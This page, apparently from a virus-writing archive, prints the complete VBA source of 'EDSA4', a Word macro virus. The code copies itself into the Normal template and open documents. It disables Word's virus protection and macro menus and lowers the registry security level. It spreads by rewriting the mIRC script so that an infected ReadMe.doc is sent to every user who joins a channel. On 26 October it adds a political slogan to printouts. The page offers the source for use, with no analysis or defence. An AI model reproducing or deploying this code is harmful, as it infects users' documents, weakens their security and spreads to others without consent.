<html>
<head>
</head>
<body>


<p><b><u>EDSA4 by ppacket</u></b>
<p><u>file EDSA4.bas:</u>
<p>Attribute VB_Name = "EDSA4"
<br>Sub AutoExec()
<br>On Error Resume Next
<p>Call stealth
<br>Call infest
<br>With Dialogs(wdDialogFileSummaryInfo)
<br>.Author = "pickpacket"
<br>.Keywords = ""
<br>.Execute
<br>End With
<br>Exists = Dir("c:\mirc\mirc32.exe")
<br>If Exists = "" Then
<br>Exit Sub
<br>Else
<br>dropped = Dir("c:\mirc\download\ReadMe.doc")
<br>If dropped = "" Then ActiveDocument.SaveAs "c:\mirc\download\ReadMe.doc"
<br>Kill "c:\mirc\script.ini"
<br>Open "c:\mirc\script.ini" For Output As #1
<br>Print #1, "[script]"
<br>Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\ReadMe.doc }"
<br>Print #1, "n1=on 1:CONNECT: {"
<br>Print #1, "n2= /clear"
<br>Print #1, "n3= /motd"
<br>Print #1, "n4= }"
<br>Close #1
<br>End If
<br>&nbsp;
<br>&nbsp;
<br>End Sub
<br>&nbsp;
<br>&nbsp;
<br>Sub filePrint()
<br>On Error Resume Next
<p>If Day(Now) = 26 And Month(Now) = 10 Then
<br>Selection.InsertAfter "With the new government rises the ash of the former administrations" & vbCr & "Fuck the Philippine government what we want is EDSA4!!"
<br>Selection.InsertAfter vbCr & "by pickpacket"
<br>End If
<br>Dialogs(wdDialogFilePrint).Show
<p>End Sub
<p>Sub AutoClose()
<br>On Error Resume Next
<p>Call infest
<p>End Sub
<p>Sub FileSave()
<br>On Error Resume Next
<p>Dialogs(wdDialogFileSave).Show
<br>Call infest
<p>End Sub
<p>Sub infest()
<br>On Error Resume Next
<p>Set normtemp = NormalTemplate.VBProject.VBComponents
<br>Set actvdoc = ActiveDocument.VBProject.VBComponents
<br>Application.VBE.ActiveVBProject.VBComponents("EDSA4").export "c:\ppacket.vxd"
<br>If normtemp.Item("EDSA4").Name <> "EDSA4" Then
<br>normtemp.Remove normtemp(2)
<br>normtemp.import "c:\ppacket.vxd"
<br>NormalTemplate.Save
<br>ElseIf actvdoc.Item("EDSA4").Name <> "EDSA4" Then
<br>actvdoc.Remove actvdoc(2)
<br>actvdoc.import "c:\ppacket.vxd"
<br>End If
<br>Kill "c:\ppacket.vxd"
<br>End Sub
<p>Sub stealth()
<br>On Error Resume Next
<p>CommandBars("Tools").Controls("Macro").Delete
<br>CommandBars("Tools").Controls("Templates and Add-Ins...").Delete
<br>CommandBars("Tools").Controls("Customize...").Delete
<br>CommandBars("Format").Controls("Style...").Delete
<br>With Options
<br>.ConfirmConversions = False
<br>.SaveNormalPrompt = False
<br>.VirusProtection = False
<br>End With
<br>KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=0, Command:=" "
<br>Application.DisplayStatusBar = False
<br>ActiveDocument.ReadOnlyRecommended = False
<br>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
<br>&nbsp;CommandBars("Macro").Controls("Security...").Enabled = False
<p>End Sub

</body>
</html>
